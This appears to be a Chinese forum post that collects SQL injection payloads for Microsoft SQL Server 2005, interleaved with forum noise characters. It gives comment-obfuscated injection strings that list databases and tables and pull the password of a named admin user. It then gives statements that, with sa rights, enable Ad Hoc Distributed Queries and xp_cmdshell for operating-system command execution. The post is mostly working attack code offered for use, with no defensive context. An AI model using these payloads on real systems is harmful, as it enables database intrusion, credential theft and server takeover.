MSsql2005注入语句

admin

" M6 i2 }- d/ n- e6 w[Copy to clipboard]CODE:
+ B% A! L0 e( }8 `( h/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
& q6 ]9 Z& N( x3 o% O2 o! S8 S* P
爆表语句,somedb部份是所要列的数据库，红色数字1累加

8 G6 z$ k- R1 T9 H# r+ f
[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

  j1 ]/ }; ~, h) ]爆字段语句，爆表admin里user='icerover'的密码段
- d& G, J  j1 ?2 P
' @2 ?% Z! w% N" ^) ]) u2 A0 u
[Copy to clipboard]CODE:
. M, ?5 {, Z# j4 d& ^# \" H5 f**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
1 p5 S! d: o$ w/ v, R
mssql2005默认没有开xp_cmdshell的，openrowset也不能用
如果是sa权限，可以这样来开启
# Q( x, t+ D* b' J- k. c- x  D0 c5 Q开启openrowset

+ u9 s! U7 H% e; H
[Copy to clipboard]CODE:
7 t  W! m  k& ^7 q5 r+ b/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
; @- N% c7 x. y& u  {
& R5 [0 C' Q6 @# a, f/ O3 [" Y( p开启xp_cmdshell
+ |/ r4 }" ]* S; _- b' H" t
) t8 V, x" O  P6 M
6 n: m# T" E$ N6 @  F' {5 N: y[Copy to clipboard]CODE:
( M* K. ~; l5 U, r, i' vEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
0 q0 @- {( _7 e1 gEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

ok,over~~晚安